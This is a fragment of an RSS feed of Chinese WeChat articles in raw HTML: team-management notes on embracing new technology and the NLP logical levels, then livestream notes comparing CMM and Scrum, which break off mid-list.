宋体;color:black;mso-font-kerning:0pt;">8、一切基于事实去做事<o:p></o:p></span></p><p><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">不要听信任何人，以事实为依据去做事<o:p></o:p></span></p><p><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">9、抽丝剥茧寻找事物的本质<o:p></o:p></span></p><p><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">永远保持一颗孩童般寻根问到底的心，你会发现，表面背后的本质更精彩<o:p></o:p></span></p><p><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">10、善待你的本职工作<o:p></o:p></span></p><p><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">本职工作都做不好的人，很难说是一个成功的人<o:p></o:p></span></p><p><strong><span lang="EN-US" style="font-size:14.0pt;font-family:
&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:&#34;微软雅黑 Light&#34;;color:#2E75B5;mso-font-kerning:0pt;">Andy</span></strong><strong><span style="font-size:14.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:#2E75B5;mso-font-kerning:
0pt;">：开放心态拥抱新技术</span></strong><strong><span lang="EN-US" style="font-size:14.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;color:#2E75B5;mso-font-kerning:0pt;"><o:p></o:p></span></strong></p><p><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">谈到</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
&#34;微软雅黑 Light&#34;;color:black;mso-font-kerning:0pt;">AI, LLM</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;"><o:p></o:p></span></p><p><span style="font-size: 12px;font-family: 微软雅黑, sans-serif;color: black;">1930年代,医院开始使用洗碗机,这使得原本需要人工洗碗的工作量减少了。由于不再需要那么多人来洗碗,医院能够把节省下来的人力成本转为增加医生和护士的投入。彼得·德鲁克可能通过研究发现,医院使用洗碗机后,工作效率提高,能够获得更多资金投入医疗服务,改善医生和护士的待遇。这反映出机械化可以提高效率,让组织优化资源配置,把更多资金用在核心业务上。</span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:
0pt;"><o:p></o:p></span></p><p><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">科技研发，未来会有更高的技术，要参与其中，</span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:#FA0000;mso-font-kerning:0pt;">用开放的心去拥抱新技术</span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">。<o:p></o:p></span></p><p><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">Ivy荐书：《人类的木马程序》<o:p></o:p></span></p><p><strong><span style="font-size:14.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:#276296;mso-font-kerning:0pt;">阿芹：幸福员工组成企业生命体<o:p></o:p></span></strong></p><p><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">泰勒·本·沙哈尔（Tal Ben-Shahar）的传奇，以色列，体育运动员，哈佛本硕博。<o:p></o:p></span></p><p><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">以人为本，投资员工幸福，把企业做成生命体<o:p></o:p></span></p><h2 style="margin:0cm;"><span lang="EN-US" style="font-size:14.0pt;font-family:
&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:&#34;微软雅黑 Light&#34;;color:#2E75B5;">Michelle</span><span style="font-size:14.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;color:#2E75B5;">：愉悦心情</span><span style="font-size:14.0pt;color:#2E75B5;">→</span><span style="font-size:14.0pt;font-family:
&#34;微软雅黑&#34;,sans-serif;color:#2E75B5;">发挥创意</span><span lang="EN-US" style="font-size:
14.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;color:#2E75B5;"><o:p></o:p></span></h2><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;color:black;">课后问：为什么西方有很多优秀软件，国内软件三十年还是一地尘埃？<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;color:black;">“脑力劳动者需要被尊重，需要有空间能够发挥出最好的自己，需要有愉悦的心情才能发挥创意”。<o:p></o:p></span></p><p><strong><span style="font-size:16.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:#14324D;mso-font-kerning:18.0pt;">附录<o:p></o:p></span></strong></p><p><span style="font-size: 12px;"><strong><span style="font-family: 微软雅黑, sans-serif;color: rgb(60, 135, 205);">团队加班<o:p></o:p></span></strong></span></p><p><span style="font-family: 微软雅黑, sans-serif;color: black;font-size: 12px;">要说清楚为什么团队要加班，加班多长时间，持续期间，以便成员能够安排家庭生活。比聚餐管用，再实在点就是看在钱的份上。<o:p></o:p></span></p><p><span style="font-size: 12px;"><strong><span style="font-family: 微软雅黑, sans-serif;color: rgb(60, 135, 205);">什么时候把看板拆了<o:p></o:p></span></strong></span></p><p><span style="font-family: 微软雅黑, sans-serif;color: black;font-size: 12px;">之前的一个团队士气非常低落，我们搭了一个物理看板。第一天站会的最后，问大家有什么问题。<o:p></o:p></span></p><p><span style="font-family: 微软雅黑, sans-serif;color: black;font-size: 12px;">直接有一个人当着30+成员的面，问：我们的看板啥时候拆。<o:p></o:p></span></p><p><span style="font-size: 12px;font-family: 微软雅黑, sans-serif;color: black;">- 这种人直接开除<o:p></o:p></span></p><p><span style="font-size: 12px;font-family: 微软雅黑, sans-serif;color: black;">-
nonono，最后他是最积极的，格局打开; 要善于调动和转化这种积极份子;不怕唱反调就怕没有声音; 要珍惜每一个团队中的刺头儿。<o:p></o:p></span></p><p><span style="font-size: 12px;"><strong><span lang="EN-US" style="font-family: Calibri, sans-serif;color: rgb(91, 155, 213);">NLP</span></strong><strong><span style="font-family: 微软雅黑, sans-serif;color: rgb(91, 155, 213);">逻辑层次</span></strong><strong><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(91, 155, 213);"><o:p></o:p></span></strong></span></p><p><span style="font-size: 12px;"><span lang="EN-US" style="font-family: Calibri, sans-serif;color: black;">NLP</span><span style="font-family: 微软雅黑, sans-serif;color: black;">的逻辑层次是一种用来分析和理解人的思维和行为的模型，它将人的思维和行为分为六个不同的层次，从低到高依次是：环境、行为、能力、信念</span><span lang="EN-US" style="font-family: Calibri, sans-serif;color: black;">/</span><span style="font-family: 微软雅黑, sans-serif;color: black;">价值观、身份和精神。每一个层次都包含了下面层次的元素，而且每一个层次都会影响到其他层次。高层次的改变会导致低层次的改变，而低层次的改变不一定会影响到高层次。这个模型可以帮助我们更好地认识自己，解决问题，提高思维深度和创造力。</span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;"><o:p></o:p></span></span></p><p><span style="font-size: 12px;"><span lang="EN-US" style="font-family: Calibri, sans-serif;color: black;">NLP</span><span style="font-family: 微软雅黑, sans-serif;color: black;">的六个逻辑层次的典型思考模式和解释分别是：</span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;"><o:p></o:p></span></span></p><p style="vertical-align: middle;"><span style="font-size: 12px;"><span lang="EN-US" style="font-family: 微软雅黑, sans-serif;color: black;">- 环境：”都是你们的错“。这个层次指的是我们所处的外部环境，包括时间、地点、人物、物品等。这个层次决定了我们可以做什么，以及我们面临的机会和挑战。</span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;"><o:p></o:p></span></span></p><p style="vertical-align: middle;"><span style="font-size: 12px;"><span lang="EN-US" style="font-family: 微软雅黑, sans-serif;color: black;">- 行为：”我还不够努力“。这个层次指的是我们在环境中所做的具体行为，包括说话、写作、动作等。这个层次反映了我们的能力和技能，以及我们如何应对环境。</span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;"><o:p></o:p></span></span></p><p style="vertical-align: middle;"><span style="font-size: 12px;"><span lang="EN-US" style="font-family: 微软雅黑, sans-serif;color: black;">- 能力：”方法总比问题多“。这个层次指的是我们拥有的能力和技能，包括知识、经验、策略、方法等。这个层次决定了我们能做什么，以及我们如何提高自己的行为。</span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;"><o:p></o:p></span></span></p><p style="vertical-align: middle;"><span style="font-size: 12px;"><span lang="EN-US" style="font-family: 微软雅黑, sans-serif;color: black;">- 信念</span><span lang="EN-US" style="font-family: Calibri, sans-serif;color: black;">/</span><span style="font-family: 微软雅黑, sans-serif;color: black;">价值观：”什么才是更重要的“。这个层次指的是我们对自己、他人和世界的信念和价值观，包括观念、态度、假设、规则等。这个层次决定了我们为什么要做什么，以及我们如何评价自己和他人的行为。</span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;"><o:p></o:p></span></span></p><p style="vertical-align: middle;"><span style="font-size: 12px;"><span lang="EN-US" style="font-family: 微软雅黑, sans-serif;color: black;">- 身份：“因为我是</span><span lang="EN-US" style="font-family: Calibri, sans-serif;color: black;">…</span><span style="font-family: 微软雅黑, sans-serif;color: black;">，所以我会</span><span lang="EN-US" style="font-family: Calibri, sans-serif;color: black;">…&#34;</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">。</span><span style="font-family: 微软雅黑, sans-serif;color: black;">这个层次指的是我们对自己的认同和定位，包括角色、身份、使命、愿景等。这个层次决定了我们是谁，以及我们如何看待自己在世界中的位置。</span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;"><o:p></o:p></span></span></p><p style="vertical-align: middle;"><span style="font-size: 12px;font-family: 微软雅黑, sans-serif;color: black;">- 精神：“人活着就是为了改变世界”。这个层次指的是我们对超越自我的连接和意义，包括信仰、灵性、目标、价值等。这个层次决定了我们与谁相连，以及我们如何理解生命的意义。</span><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;"><o:p></o:p></span></p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.562962962962963" data-s="300,640" data-type="jpeg" data-w="1080" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=9461cc38&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FFStUibflSINyhhPCLuiaNZibiahBb74nculTia1iazPwox7ibdo9MBcyBdPV14dicCCKE4Sw0xK6yLd4tqVAic45bJCBu6g%2F640%3Fwx_fmt%3Djpeg"/></p><p><o:p></o:p></p><p><span style="font-size: 12px;">---</span><o:p></o:p></p><p><span style="font-size: 12px;">木心：常以为人是一个容器，盛着快乐，盛着悲哀。但人不是容器，人是导管，快乐流过，悲哀流过，导管只是导管 ...... 管壁增厚的人，快乐也慢，悲哀也慢。淤塞的导管会破裂。</span><o:p></o:p></p><p><span style="font-size: 12px;">结语：祝大家保持畅通无阻、轻松曼妙、苟日新日日新！</span><span lang="EN-US"><o:p></o:p></span></p><p><br/></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247483768">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=83400d4e&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzg3NTc4NDAxMA%3D%3D%26mid%3D2247483768%26idx%3D1%26sn%3D0d009dd6c81320d1f80cc80969e16dfa%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Wed, 30 Aug 2023 16:09:00 +0800</pubDate>
    </item>
    <item>
      <title>Scrum Pattern学习社群笔记之“能力成熟度”</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzg3NTc4NDAxMA==&amp;mid=2247483753&amp;idx=1&amp;sn=25d5a05add63116c95050887e18a2e30</link>
      <description>6月15日参加Scrum Pattern学习社群直播，有个问题得到诸位老师解答</description>
      <content:encoded><![CDATA[<p>
<span>临摹不是写生</span> <span>2023-07-13 23:17</span> <span style="display: inline-block;">美国</span>
</p>

<p>6月15日参加Scrum Pattern学习社群直播，有个问题得到诸位老师解答</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=bbb1f653&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FFStUibflSINzgmNWuyy93y2oJaHqXNgKnib847erTRQI427PkKJLhHmtqNVRLwia6YKdkdm8GWzLOqAmLDdnVAL5A%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<p><span style="font-size: var(--articleFontsize);letter-spacing: 0.034em;">6月15日参加</span><span style="font-size: var(--articleFontsize);letter-spacing: 0.034em;">Scrum Pattern学习社群</span><span style="font-size: var(--articleFontsize);letter-spacing: 0.034em;">直播</span><span style="font-size: var(--articleFontsize);letter-spacing: 0.034em;">，有个问题得到诸位老师解答，提问赢得￥1000培训劵，欣然记录这一课。</span><br/></p><p style=""><strong><span lang="EN-US" style="font-size:16.0pt;font-family:
&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;color:#1E4E79;mso-font-kerning:
18.0pt;">CMM</span></strong><strong><span style="font-size:16.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:Calibri;color:#1E4E79;mso-font-kerning:18.0pt;">和</span></strong><strong><span lang="EN-US" style="font-size:16.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
宋体;color:#1E4E79;mso-font-kerning:18.0pt;">SCRUM</span></strong><strong><span style="font-size:16.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:#1E4E79;mso-font-kerning:18.0pt;">相比，思想上有什么不同？</span></strong><strong><span lang="EN-US" style="font-size:16.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
宋体;color:#1E4E79;mso-font-kerning:18.0pt;"><o:p></o:p></span></strong></p><p style=""><strong><span style="font-size:14.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:Calibri;color:#2E75B5;mso-font-kerning:0pt;">感受：<span lang="EN-US"><o:p></o:p></span></span></strong></p><ul style="list-style: none;" type="disc" class="list-paddingleft-1"><li style="text-align:left;mso-pagination:widow-orphan;mso-list:l2 level1 lfo1;tab-stops:list 36.0pt;vertical-align:middle;"><p><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;">CMM</span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
     Calibri;mso-font-kerning:0pt;">要投入较多资源</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
     宋体;mso-font-kerning:0pt;"><o:p></o:p></span></p></li><li style="text-align:left;mso-pagination:widow-orphan;mso-list:l2 level1 lfo1;tab-stops:list 36.0pt;vertical-align:middle;"><p><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;">CMM</span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
     Calibri;mso-font-kerning:0pt;">实施时优先顺序不是太明显</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
     宋体;mso-font-kerning:0pt;"><o:p></o:p></span></p></li><li style="text-align:left;mso-pagination:widow-orphan;mso-list:l2 level1 lfo1;tab-stops:list 36.0pt;vertical-align:middle;"><p><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;">CMM</span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
     Calibri;mso-font-kerning:0pt;">认证时，常需要造假数据才能通过</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
     宋体;mso-font-kerning:0pt;"><o:p></o:p></span></p></li><li style="text-align:left;mso-pagination:widow-orphan;mso-list:l2 level1 lfo1;tab-stops:list 36.0pt;vertical-align:middle;"><p><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
     Calibri;mso-font-kerning:0pt;">现在基于</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
     宋体;mso-font-kerning:0pt;">CMM</span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:Calibri;mso-font-kerning:
     0pt;">的模型越来越多，如<span lang="EN-US">devops cmm</span></span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;"><o:p></o:p></span></p></li></ul><p style=""><strong><span style="font-size:14.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:Calibri;color:#2E75B5;mso-font-kerning:0pt;">回答：<span lang="EN-US"><o:p></o:p></span></span></strong></p><p style=""><strong><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
Calibri;mso-font-kerning:0pt;">Lisa</span></strong><strong><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:Calibri;mso-font-kerning:
0pt;">：</span></strong><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:Calibri;mso-font-kerning:0pt;"><o:p></o:p></span></p><ul style="list-style: none;" type="disc" class="list-paddingleft-1"><li style="text-align:left;mso-pagination:widow-orphan;mso-list:l1 level1 lfo2;tab-stops:list 36.0pt;vertical-align:middle;"><p><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
     Calibri;mso-font-kerning:0pt;">问题比较敏感啊，大叔杨、东伟、店明都很有经验</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;"><o:p></o:p></span></p></li><li style="text-align:left;mso-pagination:widow-orphan;mso-list:l1 level1 lfo2;tab-stops:list 36.0pt;vertical-align:middle;"><p><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
     Calibri;mso-font-kerning:0pt;">这个提问，好像隐含一个观点，即敏捷和</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
     宋体;mso-font-kerning:0pt;">CMM</span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:Calibri;mso-font-kerning:
     0pt;">是冲突的</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;"><o:p></o:p></span></p></li><ul style="margin-top:0cm;" type="circle" class="list-paddingleft-1"><li style="text-align:left;mso-pagination:widow-orphan;mso-list:l1 level2 lfo2;tab-stops:list 72.0pt;vertical-align:middle;"><p><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;">CMM</span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
      Calibri;mso-font-kerning:0pt;">要文档，先把文档补全？但这不是真的，<span style="color:#FA0000;">这是误解</span></span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;"><o:p></o:p></span></p></li></ul></ul><p style=""><strong><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
Calibri;mso-font-kerning:0pt;">大叔杨：</span></strong><span lang="EN-US" style="font-size:
11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:Calibri;mso-font-kerning:
0pt;"><o:p></o:p></span></p><ul style="list-style: none;" type="disc" class="list-paddingleft-1"><li style="text-align:left;mso-pagination:widow-orphan;mso-list:l4 level1 lfo3;tab-stops:list 36.0pt;vertical-align:middle;"><p><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
     Calibri;mso-font-kerning:0pt;">实践体会</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
     宋体;mso-font-kerning:0pt;"><o:p></o:p></span></p></li><ul style="margin-top:0cm;" type="circle" class="list-paddingleft-1"><li style="text-align:left;mso-pagination:widow-orphan;mso-list:l4 level2 lfo3;tab-stops:list 72.0pt;vertical-align:middle;"><p><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;">2003</span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
      Calibri;mso-font-kerning:0pt;">年接触</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
      宋体;mso-font-kerning:0pt;">CMM</span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:Calibri;mso-font-kerning:
      0pt;">，带领团队通过</span><span lang="EN-US" style="font-size:11.0pt;font-family:
      &#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;">3</span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
      Calibri;mso-font-kerning:0pt;">级标准。时间周期</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
      宋体;mso-font-kerning:0pt;">9</span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:Calibri;mso-font-kerning:
      0pt;">个月。之后管了</span><span lang="EN-US" style="font-size:11.0pt;font-family:
      &#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;">4</span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
      Calibri;mso-font-kerning:0pt;">年时间研发过程，之后这些流程稳定运行了</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
      宋体;mso-font-kerning:0pt;">10</span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:Calibri;mso-font-kerning:
      0pt;">年。</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;"><o:p></o:p></span></p></li><li style="text-align:left;mso-pagination:widow-orphan;mso-list:l4 level2 lfo3;tab-stops:list 72.0pt;vertical-align:middle;"><p><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;color:#FA0000;mso-font-kerning:0pt;">CMM</span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
      Calibri;color:#FA0000;mso-font-kerning:0pt;">是好东西，是可以低成本的方式做到的</span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
      Calibri;mso-font-kerning:0pt;">，不会让大家觉得那么难受，应该是会让大家开心地完成的。<span style="color:#FA0000;">只是被“做坏了“</span>。</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
      宋体;mso-font-kerning:0pt;"><o:p></o:p></span></p></li><li style="text-align:left;mso-pagination:widow-orphan;mso-list:l4 level2 lfo3;tab-stops:list 72.0pt;vertical-align:middle;"><p><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:Calibri;mso-font-kerning:0pt;">Documentation</span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
      Calibri;mso-font-kerning:0pt;">是文档化。<span style="color:#FA0000;">要写一堆文档是很要命的误解</span>。</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;"><o:p></o:p></span></p></li></ul><li style="text-align:left;mso-pagination:widow-orphan;mso-list:l4 level1 lfo3;tab-stops:list 36.0pt;vertical-align:middle;"><p><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
     Calibri;mso-font-kerning:0pt;">问题出在哪里？</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
     宋体;mso-font-kerning:0pt;"><o:p></o:p></span></p></li><ul style="margin-top:0cm;" type="circle" class="list-paddingleft-1"><li style="text-align:left;mso-pagination:widow-orphan;mso-list:l4 level2 lfo3;tab-stops:list 72.0pt;vertical-align:middle;"><p><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
      Calibri;mso-font-kerning:0pt;">反馈的问题不是</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
      宋体;mso-font-kerning:0pt;">CMM</span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:Calibri;mso-font-kerning:
      0pt;">的问题，而是咨询机构和主任评估师的问题，<span style="color:#FA0000;">给了甲方完全不适合的东西</span>。</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;"><o:p></o:p></span></p></li><li style="text-align:left;mso-pagination:widow-orphan;mso-list:l4 level2 lfo3;tab-stops:list 72.0pt;vertical-align:middle;"><p><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
      Calibri;mso-font-kerning:0pt;">反馈的问题也不能全是咨询师、评估师的问题，而是<span style="color:#FA0000;">企业提出来的目标就是要过认证</span>，短平快、成本少地过认证。</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;"><o:p></o:p></span></p></li></ul><li style="text-align:left;mso-pagination:widow-orphan;mso-list:l4 level1 lfo3;tab-stops:list 36.0pt;vertical-align:middle;"><p><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
     Calibri;mso-font-kerning:0pt;">数据问题</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
     宋体;mso-font-kerning:0pt;"><o:p></o:p></span></p></li><ul style="margin-top:0cm;" type="circle" class="list-paddingleft-1"><li style="text-align:left;mso-pagination:widow-orphan;mso-list:l4 level2 lfo3;tab-stops:list 72.0pt;vertical-align:middle;"><p><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
      Calibri;mso-font-kerning:0pt;">高成熟度</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
      宋体;mso-font-kerning:0pt;">4/5</span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:Calibri;mso-font-kerning:
      0pt;">级认证，往往存在数据造假</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:
      0pt;"><o:p></o:p></span></p></li><li style="text-align:left;mso-pagination:widow-orphan;mso-list:l4 level2 lfo3;tab-stops:list 72.0pt;vertical-align:middle;"><p><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
      Calibri;mso-font-kerning:0pt;">敏捷往往是真实的数据，可以快速做到</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
